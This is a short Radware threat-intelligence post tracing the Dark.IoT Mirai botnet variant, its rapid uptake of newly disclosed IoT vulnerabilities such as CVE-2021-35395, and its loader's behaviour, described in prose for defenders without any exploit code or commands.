Over the past several months, Radware researchers have been monitoring the evolution of a Mirai variant we have named "Dark.IoT."
Read the Complete Alert
On March 15th, Unit 42 researchers at Palo Alto Networks published an alert  about a new Mirai variant rapidly integrating recently disclosed vulnerabilities. Palo Alto Networks reported that the threat actors behind the botnet leveraged CVE-2021-27561 and CVE-2021-27562 within hours of the vulnerabilities' being published. They also noted that the operators were testing several other exploits over the following weeks, including CVE-2021-22502 and CVE-2020-26919. In total, Palo Alto Network said that the operators attempted to leverage five known and three unknown vulnerabilities.
On August 6th, Juniper Threat Labs published a report  about a Mirai variant seen propagating in the wild via CVE-2021-20090, a supply chain vulnerability recently disclosed by Tenable , that impacts IoT devices manufactured by nearly two dozen vendors that all leverage Arcadyan firmware in their devices. Juniper Threat Labs discovered that this botnet was using the same naming conventions and was rapidly leveraging new exploits, like the one found by Palo Alto Networks. For example, the operators behind the botnet leveraged CVE-2021-20090 just two days after Tenable published the vulnerability details. Juniper Threat Labs reported that the botnet, at the time, was attempting to test for and exploit six known vulnerabilities tracked by a CVE as well as several other unassigned exploits.
On August 19th, Radware researchers found that new malware binaries were published on both loaders leveraged in the campaign. While reviewing the new binaries, we discovered that the operators behind the botnet had incorporated and are presently preparing to leverage yet another supply chain vulnerability: CVE-2021-35395. This vulnerability was recently disclosed  by IoT Inspectors Research Lab on August 16th and impacts IoT devices manufactured by 65 vendors relying on the Realtek chipsets and SDK.
The operators behind the Dark.IoT botnet have been developing this variant of the Mirai botnet since February of 2021. We named the botnet Dark.IoT based on the use of 'Dark.[architecture]' filenames for its malware binaries and the reoccurring use of 'lmaoiot' variations throughout its infrastructure naming.
As Palo Alto Networks reported in March of 2021, Dark.IoT still tries to delete contents of key system folders /tmp and /var/log from targeted devices when executing the 'lolol.sh' loader script on new victims. In addition, the shell script leverages the killall command to terminate both legitimate and competing bot processes running on the device before downloading Dark.IoT binaries.